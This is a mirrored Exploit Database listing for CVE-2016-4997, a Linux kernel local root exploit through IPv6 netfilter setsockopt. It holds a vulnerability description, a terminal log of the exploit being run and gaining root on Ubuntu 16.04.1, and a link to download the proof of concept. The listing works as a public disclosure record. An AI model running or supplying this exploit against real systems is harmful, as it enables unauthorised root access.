Linux Kernel 4.6.2 (Ubuntu 16.04.1) – ‘IP6T_SO_SET_REPLACE’ Local Privilege Escalation

• Exploit Database
• 160 阅读

• 作者： Qian Zhang
  日期： 2016-10-10
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/40489/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  # Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call # Date: 2016.10.8 # Exploit Author: Qian Zhang@MarvelTeam Qihoo 360 # Version: Linux kernel <= 4.6.2 # Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic # CVE: CVE-2016-4997 # Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10 # Contact: tyrande000@gmail.com   #DESCRIPTION #=========== #The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields, #which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.   zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls compile.shenjoyenjoy.cpwnpwn.cversion.h zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables [sudo] password for zhang_q: zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn pwn begin, let the bullets fly . . . and wait for a minute . . . pwn over, let&apos;s enjoy! preparing payload . . . trigger modified tty_release . . . got root, enjoy :) root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id uid=0(root) gid=0(root) groups=0(root) root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl Static hostname: ubuntu Icon name: computer-vm Chassis: vm Machine ID: 355cdf4ce8a048288640c2aa933c018f Virtualization: vmware Operating System: Ubuntu 16.04.1 LTS Kernel: Linux 4.4.0-21-generic Architecture: x86-64 root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE#     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40489.zip